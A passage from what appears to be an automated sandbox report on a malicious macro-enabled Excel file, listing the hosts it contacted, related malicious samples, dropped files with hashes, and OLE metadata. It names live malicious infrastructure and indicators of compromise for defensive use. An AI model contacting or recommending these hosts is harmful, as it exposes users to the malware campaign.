                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  192.185.39.58
                                                                                                                                                  signifysystem.comUnited States
                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                  192.185.32.232
                                                                                                                                                  fcventasyservicios.clUnited States
                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:412222
                                                                                                                                                  Start date:12.05.2021
                                                                                                                                                  Start time:14:16:33
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 12s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:8100c344_by_Libranalysis.xls
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:20
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal68.expl.evad.winXLS@5/7@2/2
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xls
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  192.185.39.588100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                    32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                      32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                        9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                            46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                              192.185.32.2328100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                    9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                        46747509_by_Libranalysis.xlsGet hashmaliciousBrowse

                                                                                                                                                                          Domains

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                          signifysystem.com32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          fcventasyservicios.cl8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232

                                                                                                                                                                          ASN

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                          UNIFIEDLAYER-AS-1US8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 192.232.222.43
                                                                                                                                                                          abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                          • 67.20.76.71
                                                                                                                                                                          Revised Invoice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.171.219
                                                                                                                                                                          DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 162.241.169.22
                                                                                                                                                                          dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.171.219
                                                                                                                                                                          RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.129.32
                                                                                                                                                                          Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 162.241.62.63
                                                                                                                                                                          in.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 162.241.244.112
                                                                                                                                                                          PO-002755809-NO#PRT101 Order pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 162.144.13.239
                                                                                                                                                                          catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 108.167.180.164
                                                                                                                                                                          catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 108.167.180.164
                                                                                                                                                                          export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          • 108.179.232.90
                                                                                                                                                                          XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          • 162.241.190.216
                                                                                                                                                                          QTFsui5pLN.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          • 108.179.232.90
                                                                                                                                                                          UNIFIEDLAYER-AS-1US8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 192.232.222.43
                                                                                                                                                                          abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                          • 67.20.76.71
                                                                                                                                                                          Revised Invoice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.171.219
                                                                                                                                                                          DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 162.241.169.22
                                                                                                                                                                          dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.171.219
                                                                                                                                                                          RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.129.32
                                                                                                                                                                          Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 162.241.62.63
                                                                                                                                                                          in.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 162.241.244.112
                                                                                                                                                                          PO-002755809-NO#PRT101 Order pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 162.144.13.239
                                                                                                                                                                          catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 108.167.180.164
                                                                                                                                                                          catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 108.167.180.164
                                                                                                                                                                          export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          • 108.179.232.90
                                                                                                                                                                          XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          • 162.241.190.216
                                                                                                                                                                          QTFsui5pLN.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          • 108.179.232.90

                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e1932154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          LMNF434.vbsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          SF65G55121E0FE25552.vbsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          rF27d1O1O2.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          cSvu8bTzJU.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          Contract_kyrgyzstan_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          SMC PO 1083 SAJ 1946 .exeGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          catalog-949138716.xlsGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          - FAX ID 74172012198198.htmGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          #Ud83d#Udd7b Missed Playback Recording.wav - 1424592794.htmGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          Cotizacii#U00f3n.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          Cotizaci#U00f3n.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          statistic-1310760242.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                          Payment Slip.docxGet hashmaliciousBrowse
                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                          • 192.185.39.58

                                                                                                                                                                          Dropped Files

                                                                                                                                                                          No context

                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\BFE22172-59BF-4A95-AA18-3650190CBF48
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):134558
                                                                                                                                                                          Entropy (8bit):5.368379869105843
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:3cQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:8EQ9DQW+zPXO8
                                                                                                                                                                          MD5:24A04DA77EA2DFCDB0FE13E4DA43CC19
                                                                                                                                                                          SHA1:10846543AA8F0F31F0D03B8C4D3ACD92F7834CB9
                                                                                                                                                                          SHA-256:D347ADCC141C9EBC9E756EA044B28E10D6E51EB8C9B27795F02BB305AC800233
                                                                                                                                                                          SHA-512:F7C3099AC06C4B1B9F981F09A524DB9E000E21133203E851F20D37C771483BA30C019C1A79619749E14EC7A4F5978B0EC54E0C5C6D131C102C7BDB0DC062AA21
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-12T12:17:33">.. Build: 16.0.14108.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\55D40000
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):81549
                                                                                                                                                                          Entropy (8bit):7.910249477297128
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:sjYO+nffSDcn9iZtJOXAQR2KtCbuMB/yDL4kymYBO0y7zBr4ZLJPwT:g+nHSD8YZo/Uh0ZymYQ0y7FALST
                                                                                                                                                                          MD5:203893E2D568F581EF880AC7D03533E9
                                                                                                                                                                          SHA1:C3FAF10A9D229DE1990F296C30C51518C6559DB7
                                                                                                                                                                          SHA-256:578AE58B902F0267C984374FDFF2105D7B7153C68D07B44CF2BB2DD92ACA4608
                                                                                                                                                                          SHA-512:94810DA57033965AC2D20583C4D46BE161F98CE80A0A02CDA615EEF877C8B6C4924FFEF02DC8806A2D0438AFCAAEC96915914312E183D4A885E2C9DE235AE947
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview: .U.N#1..#.?.|.u;p..Q:.f.. .|.cW..x..@......ek....R....jaM....w-;oF..'..k......U..S.x.-[.......2.V.v.>..s.=X....hf...^c..s.....~q.]...9.d..f...zA.+'S.X.g.].j...h)...ON}...l.%(/.-Q7."..=@...Q.b....0d|.fp.'Mm..<.....0....B.R....RX;.........Q+..DL..RZ|a......f?I..b....).5V.....9...=J........I.._.....Q|.5....=T.bH._...k..vSQF.-....^..._.9.#....."=....>Q[...{..>T...._?....h......R..0<.....u ".I..m...E..'/7.CB....4y.......PK..........!..!.9............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\8100c344_by_Libranalysis.LNK
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:56 2020, mtime=Wed May 12 11:17:37 2021, atime=Wed May 12 11:17:37 2021, length=177152, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2250
                                                                                                                                                                          Entropy (8bit):4.728867896910077
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:8ZmzmFWlOEEwPbNDOEtGBB6pZmzmFWlOEEwPbNDOEtGBB6:8ZImFWlFFbNDF0KZImFWlFFbNDF0
                                                                                                                                                                          MD5:ACBC472B9470C39B3015B65ACE5CA380
                                                                                                                                                                          SHA1:57F7E259530467906A579CD82096F121339F3BB1
                                                                                                                                                                          SHA-256:2B4C47B8018D18FA3C66EBCBF81998FF00D2CC10F5EC6F4D4E7DB421467682BF
                                                                                                                                                                          SHA-512:80457D09D88E1F7CF873C7229474B5814F59EF32BC084399DC2FF1D9E36098EE5FC8C0A3413BA38C8771F036003B1D007DD122D614A85B458536DA5FC621D1FA
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview: L..................F.... .....U....|..(G..|..(G...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R&b....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q.<..user.<.......N...R&b....#J....................E...j.o.n.e.s.....~.1.....>Q.<..Desktop.h.......N...R&b.....Y..............>......f..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R-b .8100C3~1.XLS..j......>Q}<.R-b.....V....................eIL.8.1.0.0.c.3.4.4._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......b...............-.......a...........>.S......C:\Users\user\Desktop\8100c344_by_Libranalysis.xls..3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.8.1.0.0.c.3.4.4._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...As...`.......X.......377142...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.
                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Wed May 12 11:17:36 2021, atime=Wed May 12 11:17:36 2021, length=8192, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):904
                                                                                                                                                                          Entropy (8bit):4.67461849443616
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:8LF0XUpNduCH2WOfdc46286i+WrjAZ/DYbDVRSeuSeL44t2Y+xIBjKZm:8ZzmfAl6IAZbcDR7aB6m
                                                                                                                                                                          MD5:EBAC0D6C700341304AE6B2024F1E1A4C
                                                                                                                                                                          SHA1:06D18C6DAA3B63919B8BA9BA9C3995435C62E68D
                                                                                                                                                                          SHA-256:52BF9CD851546F145BCED939D2A0C64E2E925744A937015402253C7DF165810B
                                                                                                                                                                          SHA-512:1B16BA94B367105A527B40700853F415B230BBA13A76C933CA8A192D35B469A37973ED7D876C333DBB56CC8611031F5BD61E4263D1DE0D9E2A96C279A9D37A67
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview: L..................F.............-....w.(G....r.(G... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R&b....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q.<..user.<.......N...R&b....#J....................E...j.o.n.e.s.....~.1......R3b..Desktop.h.......N...R3b.....Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......377142...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):125
                                                                                                                                                                          Entropy (8bit):4.696846237155761
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:oyBVomMFUVh2LiHUwSLMp6laVn2LiHUwSLMp6lmMFUVh2LiHUwSLMp6lv:dj6FUmi0NKV+i0NbFUmi0Nf
                                                                                                                                                                          MD5:50A264AB5F2F3DD403E9167C4A6AD10C
                                                                                                                                                                          SHA1:DA0CA2A03E1F86767F74690EB06E0D3025FD7298
                                                                                                                                                                          SHA-256:76C923D77D8A498EE2AD8C6CC63C37F82A2811457DF4DF7A8C0FADDDA5AE26B4
                                                                                                                                                                          SHA-512:BAD04F6325FC982B15E46DA7742FAE24B2C68D433C3ABFE1DD2C154FD3B831867818DCDD7FA5426694C86A2DF4E5E7B4AA4E7B7D74D1919EB90EB5EE0F8522C2
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview: Desktop.LNK=0..[xls]..8100c344_by_Libranalysis.LNK=0..8100c344_by_Libranalysis.LNK=0..[xls]..8100c344_by_Libranalysis.LNK=0..
                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):22
                                                                                                                                                                          Entropy (8bit):2.9808259362290785
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                                          MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                                          SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                                          SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                                          SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                          Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                                          C:\Users\user\Desktop\56D40000
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):228873
                                                                                                                                                                          Entropy (8bit):5.616678844773404
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:37NiRdSD8YNoTU90uafzn3bK0X7vrPlsrXvLlL7LU7NiuH:sRdTrTU9Z91uH
                                                                                                                                                                          MD5:88A1DD556FE7441D8F4ACC18DD465F14
                                                                                                                                                                          SHA1:201A1DC8246AFEDB384FA6158CC70990BFC2C33F
                                                                                                                                                                          SHA-256:6FA3DFF7EC76581E9A4160F6A28B95E9FFD3A915F6F346804236BC93A03DA42B
                                                                                                                                                                          SHA-512:52BEE42F2D1AED2A445562DD2A9CC3DC991C57A5B8AD4B5760700E7CDBABD4A1A6186BAB9A183A82DC8616B6766240019648FC00EF62E4BB954F316C36A833E4
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1..................C.a.l.i.b.r.i.1..................A.r.i.a.l.1..................A.r.i.a.l.1..................A.r.i.a.l.1..................C.a.l.i.b.r.i.1...,...8..........A.r.i.a.l.1.......8..........A.r.i.a.l.1.......8..........A.r.i.a.l.1.......<..........A.r.i.a.l.1.......4..........A.r.i.a.l.1.......4..........A.r.i.a.l.1...h...8..........C.a.m.b.r.i.a.1..................C.a.l.i.b.r.i.1..................A.r.i.a.l.1..................A.r.i.a.l.1.......>..........A.r.i.a.l.1.......?..........A.r.i.a.l.1..................A.r.i.a.l.1..................A.r.i.a.l.1..................C.a.l.i.b.r.i.1..................A.r.i.a.l.1..................A.r.i.a.l.1..................A.r.i.a.l.1...............

                                                                                                                                                                          Static File Info

                                                                                                                                                                          General

                                                                                                                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:24:11 2021, Security: 0
                                                                                                                                                                          Entropy (8bit):3.258986427712615
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                          File name:8100c344_by_Libranalysis.xls
                                                                                                                                                                          File size:375808
                                                                                                                                                                          MD5:8100c34499827f8ba4a0c69872cd2205
                                                                                                                                                                          SHA1:4c7ee8ed850c211c66102389a65b0757018d1168
                                                                                                                                                                          SHA256:abb73bd58ba634f647ed144b998f9a829c69ad6410011a42147311459ed563e4
                                                                                                                                                                          SHA512:5cdc018568481aea3a092c3fd422bd79732da4b91ceb8b1a0ab9e0c64792a7e585d91726cef202ed770bdf836868f549a10c6cd37fc3acd0c5a35a63fadced2c
                                                                                                                                                                          SSDEEP:3072:Q8UGHv2tt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/tbHm7H9G4l+s2k3zN4sbc5:vUGAt6Uqa5DPdG9uS9QLp4l+s+E8
                                                                                                                                                                          File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                          File Icon

                                                                                                                                                                          Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                          Static OLE Info

                                                                                                                                                                          General

                                                                                                                                                                          Document Type:OLE
                                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                                          OLE File "8100c344_by_Libranalysis.xls"

                                                                                                                                                                          Indicators

                                                                                                                                                                          Has Summary Info:True
                                                                                                                                                                          Application Name:Microsoft Excel
                                                                                                                                                                          Encrypted Document:False
                                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                                          Contains Workbook/Book Stream:True
                                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                                          Flash Objects Count:
                                                                                                                                                                          Contains VBA Macros:True

                                                                                                                                                                          Summary

                                                                                                                                                                          Code Page:1251
                                                                                                                                                                          Author:van-van
                                                                                                                                                                          Last Saved By:vi-vi
